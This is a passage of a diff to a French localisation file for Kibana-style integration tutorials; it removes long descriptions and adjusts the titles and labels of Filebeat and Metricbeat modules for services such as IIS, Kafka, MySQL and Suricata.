"home.tutorials.ibmmqMetrics.artifacts.application.label": "Découverte", - "home.tutorials.ibmmqMetrics.longDescription": "Le module Metricbeat \"ibmmq\" récupère des indicateurs depuis les instances IBM MQ. [En savoir plus]({learnMoreLink}).", - "home.tutorials.ibmmqMetrics.nameTitle": "Indicateurs IBM MQ", + "home.tutorials.ibmmqMetrics.nameTitle": "Indicateurs IBM MQ", "home.tutorials.ibmmqMetrics.shortDescription": "Collectez les indicateurs à partir d'instances IBM MQ avec Metricbeat.", "home.tutorials.icingaLogs.artifacts.dashboards.linkLabel": "Log principal Icinga", - "home.tutorials.icingaLogs.longDescription": "Le module analyse le log principal et les logs de débogage et de démarrage d'[Icinga](https://www.icinga.com/products/icinga-2/). [En savoir plus]({learnMoreLink}).", "home.tutorials.icingaLogs.nameTitle": "Logs Icinga", "home.tutorials.icingaLogs.shortDescription": "Collectez et analysez les logs principaux, de débogage et de démarrage à partir d'Icinga avec Filebeat.", - "home.tutorials.iisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs IIS", - "home.tutorials.iisLogs.longDescription": "Le module Filebeat \"iis\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP IIS. [En savoir plus]({learnMoreLink}).", - "home.tutorials.iisLogs.nameTitle": "Logs IIS", + "home.tutorials.iisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs IIS", + "home.tutorials.iisLogs.nameTitle": "Logs IIS", "home.tutorials.iisLogs.shortDescription": "Collectez et analysez les logs à partir d'accès et d'erreurs à partir des serveurs HTTP IIS avec Filebeat.", - "home.tutorials.iisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs IIS", - "home.tutorials.iisMetrics.longDescription": "Le module Metricbeat \"iis\" collecte les indicateurs du serveur IIS ainsi que des sites web et des pools d'applications en cours d'exécution. [En savoir plus]({learnMoreLink}).", - "home.tutorials.iisMetrics.nameTitle": "Indicateurs IIS", + "home.tutorials.iisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs IIS", + "home.tutorials.iisMetrics.nameTitle": "Indicateurs IIS", "home.tutorials.iisMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs HTTP IIS avec Metricbeat.", "home.tutorials.impervaLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.impervaLogs.longDescription": "Ce module permet de recevoir des logs Imperva SecureSphere par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.impervaLogs.nameTitle": "Logs Imperva", "home.tutorials.impervaLogs.shortDescription": "Collectez et analysez les logs à partir d'Imperva SecureSphere avec Filebeat.", "home.tutorials.infobloxLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.infobloxLogs.longDescription": "Ce module permet de recevoir des logs Infoblox NIOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.infobloxLogs.nameTitle": "Logs Infoblox", "home.tutorials.infobloxLogs.shortDescription": "Collectez et analysez les logs à partir d'Infoblox NIOS avec Filebeat.", "home.tutorials.iptablesLogs.artifacts.dashboards.linkLabel": "Aperçu d'Iptables", - "home.tutorials.iptablesLogs.longDescription": "Il s'agit d'un module pour les logs iptables et ip6tables. Il analyse les logs reçus via le réseau par le biais de Syslog ou d’un fichier. En outre, il comprend le préfixe ajouté par certains pare-feux Ubiquiti qui contient le nom de l'ensemble de règles, le numéro de règle et l'action effectuée sur le trafic (autoriser/refuser). [En savoir plus]({learnMoreLink}).", "home.tutorials.iptablesLogs.nameTitle": "Logs Iptables", "home.tutorials.iptablesLogs.shortDescription": "Collectez et analysez les logs à partir d'iptables et ip6tables avec Filebeat.", "home.tutorials.juniperLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.juniperLogs.longDescription": "Ce module permet de recevoir des logs Juniper JUNOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.juniperLogs.nameTitle": "Logs Juniper", "home.tutorials.juniperLogs.shortDescription": "Collectez et analysez les logs à partir de Juniper JUNOS avec Filebeat.", "home.tutorials.kafkaLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Kafka", - "home.tutorials.kafkaLogs.longDescription": "Le module Filebeat \"kafka\" analyse les logs créés par Kafka. [En savoir plus]({learnMoreLink}).", "home.tutorials.kafkaLogs.nameTitle": "Logs Kafka", "home.tutorials.kafkaLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Kafka avec Filebeat.", "home.tutorials.kafkaMetrics.artifacts.application.label": "Découverte", - "home.tutorials.kafkaMetrics.longDescription": "Le module Metricbeat \"kafka\" récupère des indicateurs depuis Kafka. [En savoir plus]({learnMoreLink}).", "home.tutorials.kafkaMetrics.nameTitle": "Indicateurs Kafka", "home.tutorials.kafkaMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Kafka avec Metricbeat.", "home.tutorials.kibanaLogs.artifacts.application.label": "Découverte", - "home.tutorials.kibanaLogs.longDescription": "Il s'agit du module Kibana. [En savoir plus]({learnMoreLink}).", "home.tutorials.kibanaLogs.nameTitle": "Logs Kibana", "home.tutorials.kibanaLogs.shortDescription": "Collectez et analysez les logs à partir de Kibana avec Filebeat.", "home.tutorials.kibanaMetrics.artifacts.application.label": "Découverte", - "home.tutorials.kibanaMetrics.longDescription": "Le module Metricbeat \"kibana\" récupère des indicateurs depuis Kibana. [En savoir plus]({learnMoreLink}).", "home.tutorials.kibanaMetrics.nameTitle": "Indicateurs Kibana", "home.tutorials.kibanaMetrics.shortDescription": "Collectez les indicateurs à partir de Kibana avec Metricbeat.", "home.tutorials.kubernetesMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Kubernetes", - "home.tutorials.kubernetesMetrics.longDescription": "Le module Metricbeat \"kubernetes\" récupère des indicateurs depuis les API Kubernetes. [En savoir plus]({learnMoreLink}).", "home.tutorials.kubernetesMetrics.nameTitle": "Indicateurs Kubernetes", "home.tutorials.kubernetesMetrics.shortDescription": "Collectez les indicateurs à partir d'installations Kubernetes avec Metricbeat.", "home.tutorials.logstashLogs.artifacts.dashboards.linkLabel": "Logs Logstash", - "home.tutorials.logstashLogs.longDescription": "Le module analyse les logs standard et le log de requêtes lentes Logstash. Il prend en charge les formats texte brut et JSON. [En savoir plus]({learnMoreLink}).", "home.tutorials.logstashLogs.nameTitle": "Logs Logstash", "home.tutorials.logstashLogs.shortDescription": "Collectez et analysez les logs principaux et lents à partir de Logstash avec Filebeat.", "home.tutorials.logstashMetrics.artifacts.application.label": "Découverte", - "home.tutorials.logstashMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Logstash. [En savoir plus]({learnMoreLink}).", "home.tutorials.logstashMetrics.nameTitle": "Indicateurs Logstash", "home.tutorials.logstashMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Logstash avec Metricbeat.", "home.tutorials.memcachedMetrics.artifacts.application.label": "Découverte", - "home.tutorials.memcachedMetrics.longDescription": "Le module Metricbeat \"memcached\" récupère des indicateurs depuis Memcached. [En savoir plus]({learnMoreLink}).", "home.tutorials.memcachedMetrics.nameTitle": "Indicateurs Memcached", "home.tutorials.memcachedMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Memcached avec Metricbeat.", - "home.tutorials.microsoftLogs.artifacts.dashboards.linkLabel": "Aperçu de Microsoft ATP", - "home.tutorials.microsoftLogs.longDescription": "Collectez des alertes Microsoft Defender ATP pour les utiliser avec Elastic Security [En savoir plus]({learnMoreLink}).", - "home.tutorials.microsoftLogs.nameTitle": "Logs Microsoft Defender ATP", + "home.tutorials.microsoftLogs.artifacts.dashboards.linkLabel": "Aperçu de Microsoft ATP", + "home.tutorials.microsoftLogs.nameTitle": "Logs Microsoft Defender ATP", "home.tutorials.microsoftLogs.shortDescription": "Collectez et analysez les alertes à partir de Microsoft Defender ATP avec Filebeat.", "home.tutorials.mispLogs.artifacts.dashboards.linkLabel": "Aperçu de MISP", - "home.tutorials.mispLogs.longDescription": "Il s'agit d'un module Filebeat pour la lecture des informations de Threat Intelligence depuis la plateforme MISP (https://www.circl.lu/doc/misp/). Il utilise l'entrée httpjson pour accéder à l'interface d'API REST MISP. [En savoir plus]({learnMoreLink}).", "home.tutorials.mispLogs.nameTitle": "Logs Threat Intelligence MISP", "home.tutorials.mispLogs.shortDescription": "Collectez et analysez les logs à partir de MISP Threat Intelligence avec Filebeat.", "home.tutorials.mongodbLogs.artifacts.dashboards.linkLabel": "Aperçu de MongoDB", - "home.tutorials.mongodbLogs.longDescription": "Le module collecte et analyse les logs créés par [MongoDB](https://www.mongodb.com/). [En savoir plus]({learnMoreLink}).", "home.tutorials.mongodbLogs.nameTitle": "Logs MongoDB", "home.tutorials.mongodbLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs MongoDB avec Filebeat.", "home.tutorials.mongodbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs MongoDB", - "home.tutorials.mongodbMetrics.longDescription": "Le module Metricbeat \"mongodb\" récupère des indicateurs depuis le serveur MongoDB. [En savoir plus]({learnMoreLink}).", "home.tutorials.mongodbMetrics.nameTitle": "Indicateurs MongoDB", "home.tutorials.mongodbMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs MongoDB avec Metricbeat.", "home.tutorials.mssqlLogs.artifacts.application.label": "Découverte", - "home.tutorials.mssqlLogs.longDescription": "Le module analyse les logs d'erreurs créés par MSSQL. [En savoir plus]({learnMoreLink}).", - "home.tutorials.mssqlLogs.nameTitle": "Logs Microsoft SQL Server", + "home.tutorials.mssqlLogs.nameTitle": "Logs Microsoft SQL Server", "home.tutorials.mssqlLogs.shortDescription": "Collectez et analysez les logs à partir d'instances Microsoft SQL Server avec Filebeat.", - "home.tutorials.mssqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Microsoft SQL Server", - "home.tutorials.mssqlMetrics.longDescription": "Le module Metricbeat \"mssql\" récupère des indicateurs de monitoring, de logs et de performances depuis une instance Microsoft SQL Server. [En savoir plus]({learnMoreLink}).", - "home.tutorials.mssqlMetrics.nameTitle": "Indicateurs Microsoft SQL Server", + "home.tutorials.mssqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Microsoft SQL Server", + "home.tutorials.mssqlMetrics.nameTitle": "Indicateurs Microsoft SQL Server", "home.tutorials.mssqlMetrics.shortDescription": "Collectez les indicateurs à partir d'instances Microsoft SQL Server avec Metricbeat.", "home.tutorials.muninMetrics.artifacts.application.label": "Découverte", - "home.tutorials.muninMetrics.longDescription": "Le module Metricbeat \"munin\" récupère des indicateurs depuis Munin. [En savoir plus]({learnMoreLink}).", "home.tutorials.muninMetrics.nameTitle": "Indicateurs Munin", "home.tutorials.muninMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Munin avec Metricbeat.", "home.tutorials.mysqlLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs MySQL", - "home.tutorials.mysqlLogs.longDescription": "Le module Filebeat \"mysql\" analyse les logs d'erreurs et de requêtes lentes créés par MySQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.mysqlLogs.nameTitle": "Logs MySQL", "home.tutorials.mysqlLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs MySQL avec Filebeat.", "home.tutorials.mysqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs MySQL", - "home.tutorials.mysqlMetrics.longDescription": "Le module Metricbeat \"mysql\" récupère des indicateurs depuis le serveur MySQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.mysqlMetrics.nameTitle": "Indicateurs MySQL", "home.tutorials.mysqlMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs MySQL avec Metricbeat.", "home.tutorials.natsLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs NATS", - "home.tutorials.natsLogs.longDescription": "Le module Filebeat \"nats\" analyse les logs créés par NATS. [En savoir plus]({learnMoreLink}).", - "home.tutorials.natsLogs.nameTitle": "Logs NATS", + "home.tutorials.natsLogs.nameTitle": "Logs NATS", "home.tutorials.natsLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs NATS avec Filebeat.", - "home.tutorials.natsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs NATS", - "home.tutorials.natsMetrics.longDescription": "Le module Metricbeat \"nats\" récupère des indicateurs depuis NATS. [En savoir plus]({learnMoreLink}).", - "home.tutorials.natsMetrics.nameTitle": "Indicateurs NATS", + "home.tutorials.natsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs NATS", + "home.tutorials.natsMetrics.nameTitle": "Indicateurs NATS", "home.tutorials.natsMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs NATS avec Metricbeat.", "home.tutorials.netflowLogs.artifacts.dashboards.linkLabel": "Aperçu de Netflow", - "home.tutorials.netflowLogs.longDescription": "Ce module permet de recevoir des enregistrements de flux NetFlow et IPFIX via UDP. Cette entrée prend en charge les versions 1, 5, 6, 7, 8 et 9 de NetFlow ainsi qu'IPFIX. Pour les versions de NetFlow antérieures à la version 9, les champs sont automatiquement mappés vers NetFlow v9. [En savoir plus]({learnMoreLink})", "home.tutorials.netflowLogs.nameTitle": "NetFlow / IPFIX Records", "home.tutorials.netflowLogs.shortDescription": "Collecte les enregistrements de NetFlow et du flux IPFIX avec Filebeat.", "home.tutorials.netscoutLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.netscoutLogs.longDescription": "Ce module permet de recevoir des logs Arbor Peakflow SP par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", - "home.tutorials.netscoutLogs.nameTitle": "Logs Arbor Peakflow", + "home.tutorials.netscoutLogs.nameTitle": "Logs Arbor Peakflow", "home.tutorials.netscoutLogs.shortDescription": "Collectez et analysez les logs à partir de Netscout Arbor Peakflow SP avec Filebeat.", "home.tutorials.nginxLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Nginx", - "home.tutorials.nginxLogs.longDescription": "Le module Filebeat \"nginx\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP Nginx. [En savoir plus]({learnMoreLink}).", "home.tutorials.nginxLogs.nameTitle": "Logs Nginx", "home.tutorials.nginxLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Nginx HTTP avec Filebeat.", - "home.tutorials.nginxMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Nginx", - "home.tutorials.nginxMetrics.longDescription": "Le module Metricbeat \"nginx\" récupère des indicateurs depuis le serveur HTTP Nginx. Le module récupère les données de statut du serveur depuis la page web générée par {statusModuleLink}, qui doit être activé dans votre installation Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Nginx", "home.tutorials.nginxMetrics.nameTitle": "Indicateurs Nginx", "home.tutorials.nginxMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Nginx HTTP avec Metricbeat.", - "home.tutorials.o365Logs.artifacts.dashboards.linkLabel": "Tableau de bord des audits O365", - "home.tutorials.o365Logs.longDescription": "Il s'agit d'un module pour les logs Office 365 reçus via l'un des points de terminaison d'API Office 365. Actuellement, il prend en charge les actions et les événements utilisateur, administrateur, système et de politique depuis les logs d’activité Office 365 et Azure AD exposés par l'API d’activité de gestion Office 365. [En savoir plus]({learnMoreLink}).", - "home.tutorials.o365Logs.nameTitle": "Logs Office 365", + "home.tutorials.o365Logs.artifacts.dashboards.linkLabel": "Tableau de bord des audits O365", + "home.tutorials.o365Logs.nameTitle": "Logs Office 365", "home.tutorials.o365Logs.shortDescription": "Collectez et analysez les logs à partir d'Office 365 avec Filebeat.", "home.tutorials.oktaLogs.artifacts.dashboards.linkLabel": "Aperçu d'Okta", - "home.tutorials.oktaLogs.longDescription": "Le module Okta collecte les événements de l'[API Okta](https://developer.okta.com/docs/reference/). Plus précisément, il prend en charge la lecture depuis l'[API de log système Okta](https://developer.okta.com/docs/reference/api/system-log/). [En savoir plus]({learnMoreLink}).", "home.tutorials.oktaLogs.nameTitle": "Logs Okta", "home.tutorials.oktaLogs.shortDescription": "Collectez et analysez les logs à partir de l'API Okta avec Filebeat.", - "home.tutorials.openmetricsMetrics.longDescription": "Le module Metricbeat \"openmetrics\" récupère des indicateurs depuis un point de terminaison fournissant des indicateurs au format OpenMetrics. [En savoir plus]({learnMoreLink}).", "home.tutorials.openmetricsMetrics.nameTitle": "Indicateurs OpenMetrics", "home.tutorials.openmetricsMetrics.shortDescription": "Collectez les indicateurs à partir d'un point de terminaison qui sert des indicateurs au format OpenMetrics avec Metricbeat.", "home.tutorials.oracleMetrics.artifacts.application.label": "Découverte", - "home.tutorials.oracleMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Oracle. [En savoir plus]({learnMoreLink}).", "home.tutorials.oracleMetrics.nameTitle": "Indicateurs Oracle", "home.tutorials.oracleMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Oracle avec Metricbeat.", "home.tutorials.osqueryLogs.artifacts.dashboards.linkLabel": "Pack de conformité osquery", - "home.tutorials.osqueryLogs.longDescription": "Le module collecte et décode les logs de résultats écrits par [osqueryd](https://osquery.readthedocs.io/en/latest/introduction/using-osqueryd/) au format JSON. Pour configurer \"osqueryd\", suivez les instructions d'installation d'osquery pour votre système d'exploitation et configurez le pilote de logging \"filesystem\" (celui par défaut). Assurez-vous que les horodatages UTC sont activés. [En savoir plus]({learnMoreLink}).", "home.tutorials.osqueryLogs.nameTitle": "Logs osquery", "home.tutorials.osqueryLogs.shortDescription": "Collectez et analysez les logs à partir d'Osquery avec Filebeat.", "home.tutorials.panwLogs.artifacts.dashboards.linkLabel": "Flux de réseau PANW", - "home.tutorials.panwLogs.longDescription": "Il s'agit d'un module pour les logs de monitoring des pare-feux Palo Alto Networks PAN-OS reçus par le biais de Syslog ou lus depuis un fichier. Actuellement, il prend en charge les messages de type Trafic et Menaces. [En savoir plus]({learnMoreLink}).", - "home.tutorials.panwLogs.nameTitle": "Logs Palo Alto Networks PAN-OS", + "home.tutorials.panwLogs.nameTitle": "Logs Palo Alto Networks PAN-OS", "home.tutorials.panwLogs.shortDescription": "Collectez et analysez les logs de menaces et de trafic à partir de Palo Alto Networks PAN-OS avec Filebeat.", - "home.tutorials.phpFpmMetrics.longDescription": "Le module Metricbeat \"php_fpm\" récupère des indicateurs depuis le serveur PHP-FPM. [En savoir plus]({learnMoreLink}).", "home.tutorials.phpFpmMetrics.nameTitle": "Indicateurs PHP-FPM", "home.tutorials.phpFpmMetrics.shortDescription": "Collectez les indicateurs à partir de PHP-FPM avec Metricbeat.", "home.tutorials.postgresqlLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs PostgreSQL", - "home.tutorials.postgresqlLogs.longDescription": "Le module Filebeat \"postgresql\" analyse les logs d'erreurs et de requêtes lentes créés par PostgreSQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.postgresqlLogs.nameTitle": "Logs PostgreSQL", "home.tutorials.postgresqlLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs PostgreSQL avec Filebeat.", - "home.tutorials.postgresqlMetrics.longDescription": "Le module Metricbeat \"postgresql\" récupère des indicateurs depuis le serveur PostgreSQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.postgresqlMetrics.nameTitle": "Indicateurs PostgreSQL", "home.tutorials.postgresqlMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs PostgreSQL avec Metricbeat.", "home.tutorials.prometheusMetrics.artifacts.application.label": "Découverte", - "home.tutorials.prometheusMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis le point de terminaison Prometheus. [En savoir plus]({learnMoreLink}).", "home.tutorials.prometheusMetrics.nameTitle": "Indicateurs Prometheus", "home.tutorials.prometheusMetrics.shortDescription": "Collectez les indicateurs à partir d'exportateurs Prometheus avec Metricbeat.", "home.tutorials.rabbitmqLogs.artifacts.application.label": "Découverte", - "home.tutorials.rabbitmqLogs.longDescription": "Ce module permet d'analyser les [fichiers log RabbitMQ](https://www.rabbitmq.com/logging.html). [En savoir plus]({learnMoreLink}).", "home.tutorials.rabbitmqLogs.nameTitle": "Logs RabbitMQ", "home.tutorials.rabbitmqLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs RabbitMQ avec Filebeat.", "home.tutorials.rabbitmqMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs RabbitMQ", - "home.tutorials.rabbitmqMetrics.longDescription": "Le module Metricbeat \"rabbitmq\" récupère des indicateurs depuis le serveur RabbitMQ. [En savoir plus]({learnMoreLink}).", "home.tutorials.rabbitmqMetrics.nameTitle": "Indicateurs RabbitMQ", "home.tutorials.rabbitmqMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs RabbitMQ avec Metricbeat.", "home.tutorials.radwareLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.radwareLogs.longDescription": "Ce module permet de recevoir des logs Radware DefensePro par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.radwareLogs.nameTitle": "Logs Radware DefensePro", "home.tutorials.radwareLogs.shortDescription": "Collectez et analysez les logs à partir de Radware DefensePro avec Filebeat.", "home.tutorials.redisenterpriseMetrics.artifacts.application.label": "Découverte", - "home.tutorials.redisenterpriseMetrics.longDescription": "Le module Metricbeat \"redisenterprise\" récupère des indicateurs depuis le serveur Redis Enterprise. [En savoir plus]({learnMoreLink}).", - "home.tutorials.redisenterpriseMetrics.nameTitle": "Indicateurs Redis Enterprise", + "home.tutorials.redisenterpriseMetrics.nameTitle": "Indicateurs Redis Enterprise", "home.tutorials.redisenterpriseMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Redis Enterprise avec Metricbeat.", "home.tutorials.redisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Redis", - "home.tutorials.redisLogs.longDescription": "Le module Filebeat \"redis\" analyse les logs d'erreurs et de requêtes lentes créés par Redis. Pour que Redis écrive des logs d'erreurs, assurez-vous que l'option \"logfile\" est définie sur \"redis-server.log\" dans le fichier de configuration Redis. Les logs de requêtes lentes sont lus directement depuis Redis via la commande \"SLOWLOG\". Pour que Redis enregistre des logs de requêtes lentes, assurez-vous que l'option \"slowlog-log-slower-than\" est activée. Notez que l'ensemble de fichiers \"slowlog\" est expérimental. [En savoir plus]({learnMoreLink}).", "home.tutorials.redisLogs.nameTitle": "Logs Redis", "home.tutorials.redisLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Redis avec Filebeat.", "home.tutorials.redisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Redis", - "home.tutorials.redisMetrics.longDescription": "Le module Metricbeat \"redis\" récupère des indicateurs depuis le serveur Redis. [En savoir plus]({learnMoreLink}).", "home.tutorials.redisMetrics.nameTitle": "Indicateurs Redis", "home.tutorials.redisMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Redis avec Metricbeat.", "home.tutorials.santaLogs.artifacts.dashboards.linkLabel": "Aperçu de Santa", - "home.tutorials.santaLogs.longDescription": "Le module collecte et analyse les logs de [Google Santa](https://github.com/google/santa), un outil de sécurité pour macOS qui monitore les exécutions de processus et est capable de mettre en liste noire/blanche des fichiers binaires. [En savoir plus]({learnMoreLink}).", - "home.tutorials.santaLogs.nameTitle": "Logs Google Santa", + "home.tutorials.santaLogs.nameTitle": "Logs Google Santa", "home.tutorials.santaLogs.shortDescription": "Collectez et analysez les logs à partir de systèmes Google Santa avec Filebeat.", - "home.tutorials.sonicwallLogs.longDescription": "Ce module permet de recevoir des logs Sonicwall FW par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", - "home.tutorials.sonicwallLogs.nameTitle": "Logs Sonicwall FW", + "home.tutorials.sonicwallLogs.nameTitle": "Logs Sonicwall FW", "home.tutorials.sonicwallLogs.shortDescription": "Collectez et analysez les logs à partir de Sonicwall-FW avec Filebeat.", "home.tutorials.sophosLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.sophosLogs.longDescription": "Il s'agit d'un module pour les produits Sophos. Actuellement, il prend en charge les logs XG SFOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", "home.tutorials.sophosLogs.nameTitle": "Logs Sophos", "home.tutorials.sophosLogs.shortDescription": "Collectez et analysez les logs à partir de Sophos XG SFOS avec Filebeat.", "home.tutorials.squidLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.squidLogs.longDescription": "Ce module permet de recevoir des logs Squid par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.squidLogs.nameTitle": "Logs Squid", "home.tutorials.squidLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Squid avec Filebeat.", - "home.tutorials.stanMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Stan", - "home.tutorials.stanMetrics.longDescription": "Le module Metricbeat \"stan\" récupère des indicateurs depuis STAN. [En savoir plus]({learnMoreLink}).", + "home.tutorials.stanMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Stan", "home.tutorials.stanMetrics.nameTitle": "Indicateurs STAN", "home.tutorials.stanMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs STAN avec Metricbeat.", - "home.tutorials.statsdMetrics.longDescription": "Le module Metricbeat \"statsd\" récupère des indicateurs depuis statsd. [En savoir plus]({learnMoreLink}).", "home.tutorials.statsdMetrics.nameTitle": "Indicateurs statsd", "home.tutorials.statsdMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Statsd avec Metricbeat.", "home.tutorials.suricataLogs.artifacts.dashboards.linkLabel": "Aperçu des événements Suricata", - "home.tutorials.suricataLogs.longDescription": "Il s'agit d'un module pour le log IDS/IPS/NSM Suricata. Il analyse les logs qui sont au [format JSON Suricata Eve](https://suricata.readthedocs.io/en/latest/output/eve/eve-json-format.html). [En savoir plus]({learnMoreLink}).", "home.tutorials.suricataLogs.nameTitle": "Logs Suricata", "home.tutorials.suricataLogs.shortDescription": "Collectez et analysez les logs à partir de Suricata IDS/IPS/NSM avec Filebeat.", "home.tutorials.systemLogs.artifacts.dashboards.linkLabel": "Tableau de bord Syslog système", - "home.tutorials.systemLogs.longDescription": "Le module collecte et analyse les logs créés par le service de logging système des distributions basées sur Unix/Linux communes. [En savoir plus]({learnMoreLink}).", "home.tutorials.systemLogs.nameTitle": "Logs système", "home.tutorials.systemLogs.shortDescription": "Collectez des logs système des distributions basées sur Unix/Linux communes.", "home.tutorials.systemMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs système", - "home.tutorials.systemMetrics.longDescription": "Le module Metricbeat \"system\" collecte des statistiques relatives au CPU, à la mémoire, au réseau et au disque depuis l'hôte. Il collecte des statistiques au niveau du système et des statistiques par processus et système de fichiers. [En savoir plus]({learnMoreLink}).", "home.tutorials.systemMetrics.nameTitle": "Indicateurs système", "home.tutorials.systemMetrics.shortDescription": "Collectez les indicateurs de CPU, de mémoire, de réseau et de disque à partir des hôtes System avec Metricbeat.", "home.tutorials.tomcatLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.tomcatLogs.longDescription": "Ce module permet de recevoir des logs Apache Tomcat par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.tomcatLogs.nameTitle": "Logs Tomcat", "home.tutorials.tomcatLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Apache Tomcat avec Filebeat.", "home.tutorials.traefikLogs.artifacts.dashboards.linkLabel": "Logs d'accès Traefik", - "home.tutorials.traefikLogs.longDescription": "Le module analyse les logs d'accès créés par [Traefik](https://traefik.io/). [En savoir plus]({learnMoreLink}).", "home.tutorials.traefikLogs.nameTitle": "Logs Traefik", "home.tutorials.traefikLogs.shortDescription": "Collectez et analysez les logs à partir de Traefik avec Filebeat.", - "home.tutorials.traefikMetrics.longDescription": "Le module Metricbeat \"traefik\" récupère des indicateurs depuis Traefik. [En savoir plus]({learnMoreLink}).", "home.tutorials.traefikMetrics.nameTitle": "Indicateurs Traefik", "home.tutorials.traefikMetrics.shortDescription": "Collectez les indicateurs à partir de Traefik avec Metricbeat.", "home.tutorials.uptimeMonitors.artifacts.dashboards.linkLabel": "Application Uptime", - "home.tutorials.uptimeMonitors.longDescription": "Monitorez la disponibilité des services grâce à une détection active. À partir d'une liste d'URL, Heartbeat pose cette question toute simple : Êtes-vous actif ? [En savoir plus]({learnMoreLink}).", "home.tutorials.uptimeMonitors.nameTitle": "Monitorings Uptime", "home.tutorials.uptimeMonitors.shortDescription": "Surveillez la disponibilité des services avec Heartbeat.", - "home.tutorials.uwsgiMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs uWSGI", - "home.tutorials.uwsgiMetrics.longDescription": "Le module Metricbeat \"uwsgi\" récupère des indicateurs depuis le serveur uWSGI. [En savoir plus]({learnMoreLink}).", + "home.tutorials.uwsgiMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs uWSGI", "home.tutorials.uwsgiMetrics.nameTitle": "Indicateurs uWSGI", "home.tutorials.uwsgiMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs uWSGI avec Metricbeat.", "home.tutorials.vsphereMetrics.artifacts.application.label": "Découverte", - "home.tutorials.vsphereMetrics.longDescription": "Le module Metricbeat \"vsphere\" récupère des indicateurs depuis un cluster vSphere. [En savoir plus]({learnMoreLink}).", "home.tutorials.vsphereMetrics.nameTitle": "Indicateurs vSphere", "home.tutorials.vsphereMetrics.shortDescription": "Collectez les indicateurs à partir de vSphere avec Metricbeat.", "home.tutorials.windowsEventLogs.artifacts.application.label": "Application SIEM", - "home.tutorials.windowsEventLogs.longDescription": "Utilisez 